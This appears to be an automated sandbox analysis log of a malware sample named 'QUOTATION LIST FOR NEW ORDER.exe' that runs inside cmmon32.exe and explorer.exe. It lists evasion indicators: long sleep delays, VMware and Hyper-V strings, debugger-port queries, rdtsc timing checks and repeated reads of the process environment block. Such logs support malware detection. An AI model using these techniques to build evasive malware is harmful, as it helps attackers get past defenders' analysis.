          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe TID: 5652Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeThread delayed: delay time: 39425
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 0000000B.00000000.338604104.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000B.00000000.338604104.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000B.00000000.364165399.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000B.00000000.338855726.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.338855726.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 0000000B.00000000.360571948.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.338855726.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 0000000B.00000000.338696952.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 0000000B.00000000.338696952.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 0000000B.00000000.335267258.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: explorer.exe, 0000000B.00000000.364165399.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000B.00000000.364165399.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: cmmon32.exe, 0000000C.00000002.513886346.0000000000683000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: explorer.exe, 0000000B.00000000.364165399.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_00409B10 LdrLoadDll,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04853884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04853884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04857016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04857016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04857016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04892073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04801DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04801DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04801DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04856DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04888DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0485A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04804D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04804D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04804D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04813D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04853540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04818EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0488FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04808E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04891608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04814A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04814A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0488FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04864257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0488B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0488B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0481927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0489138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0488D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04857794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04857794 mov eax, dword ptr fs:[00000030h]
